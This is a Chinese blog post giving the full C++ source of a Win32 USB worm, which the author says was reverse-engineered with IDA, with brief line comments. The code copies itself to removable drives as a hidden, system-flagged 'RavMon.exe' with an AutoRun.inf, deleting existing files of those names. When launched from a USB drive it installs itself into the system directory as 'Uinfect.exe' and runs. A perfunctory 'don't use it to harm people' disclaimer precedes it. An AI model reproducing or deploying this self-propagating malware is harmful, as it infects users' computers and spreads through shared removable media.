一个简单的C++编写的u盘病毒代码详解编程语言

一个简单的C++编写的u盘病毒代码

一个win32下能用的U盘病毒 研究原理可以 别编译拿去害人就行 (ring3的病毒貌似也害不了人) 前久用IDA逆向出来的 感兴趣的可以看看。。。

#include<windows.h> 
#include<string.h> 
   
BOOL UDevice(); 
  
void ResourceToFile(char  *filename,char *Name,char* Type); 
  
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 
     LPSTR lpCmdLine, int nShowCmd) 
 { 
     UDevice(); 
    return 0; 
 } 
  
 BOOL UDevice() 
 { 
      
     while(1) 
     { 
         char Name[256]="H://"; 
         char szName[256]; 
         char ToPath[256]; 
         char infPath[256]; 
         char OpenUDevice[79]; 
   
         UINT retType; 
       
         memset(szName, 0, 256); 
         memset(ToPath, 0, 256); 
         memset(infPath, 0, 256); 
         memset(OpenUDevice, 0, 79); 
      
      
     //do 
     //{ 
     //}while() 
      
     //遍历盘符 
         unsigned char i = 0x42; 
         for(; i < 0x5B; i += 0x1) 
         { 
           Name[0] = i; 
           retType = GetDriveType(Name); 
           //判断是否是可移动存储设备 
           if(retType == DRIVE_REMOVABLE) 
           { 
                //得到自身文件路径 
                GetModuleFileName(NULL, szName, 256); 
                //比较是否和U盘的盘符相同 
                if(strncmp(Name, szName, 1) == 0) 
                { 
                    //得到系统目录 
                   GetSystemDirectory(ToPath, 256); 
                   strcat(ToPath,"//Uinfect.exe"); 
                   //把自身文件复制到系统目录 
                   if(CopyFile(szName, ToPath, TRUE)) 
                   { 
                       WinExec(ToPath, 0);//运行程序 
                   } 
  
                   strcpy(OpenUDevice, "explorer "); 
                   strcat(OpenUDevice, Name); 
                    
                   //打开U盘 
                   WinExec(OpenUDevice,1); 
                   return 0;   
                } 
                else 
                { 
                    strcpy(ToPath, Name); 
                    strcat(ToPath,"//RavMon.exe"); 
                    strcpy(infPath,Name); 
                    strcat(infPath,"//AutoRun.inf"); 
  
  
                    //还原U盘上的文件属性 
                    SetFileAttributes(ToPath,FILE_ATTRIBUTE_NORMAL); 
                    SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL); 
                    //删除原有文件 
                    DeleteFile(ToPath); 
                    DeleteFile(infPath); 
                    //释放AutoRun.inf到U盘 
                    ResourceToFile(infPath, (char*)0x64, (char*)256); 
                    //拷贝自身文件到U盘 
                    CopyFile(szName,ToPath,FALSE); 
                     
                    //把这两个文件设置成系统,隐藏属性 
                     
                    //这里我查了MSDN  因为第二个参数的宏可能用了或位运算,所以推导宏定义有点麻烦 
                    SetFileAttributes(ToPath, 0x6); 
                    SetFileAttributes(infPath, 0x6); 
                } 
           } 
         } 
         //一分钟检测一次U盘 
         Sleep(60000); 
     } 
     
 } 
  
  
void ResourceToFile(char  *filename,char *Name,char* Type) 
{   
     
    //寻找自身进程中的资源 
    HRSRC hRes = FindResource(NULL,Name,Type); 
    if(hRes==NULL) 
        return; 
    //导入资源 
    HGLOBAL hgRes = LoadResource(NULL, hRes); 
    if(hgRes==NULL) 
        return; 
    //锁定资源 
    void *pRes = LockResource(hgRes); 
    if(pRes==NULL) 
        return; 
    //得到资源字节数 
    DWORD size = SizeofResource(NULL, hRes); 
    if(size==0) 
        return; 
    //创建文件 
    HANDLE hFile = CreateFile(filename, 0x40000000, 0, 0, 
                     CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, 0); 
    if(hFile==INVALID_HANDLE_VALUE) 
        return; 
    DWORD dwWrite; 
    //把资源写入到文件 
    if(!WriteFile(hFile, pRes, size, &dwWrite, 0)) 
        return; 
    //关闭文件句柄 
    CloseHandle(hFile); 
    //释放资源 
    GlobalFree(hgRes); 
}

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/11111.html

(0)
上一篇 2021年7月19日
下一篇 2021年7月19日

相关推荐

发表回复

登录后才能评论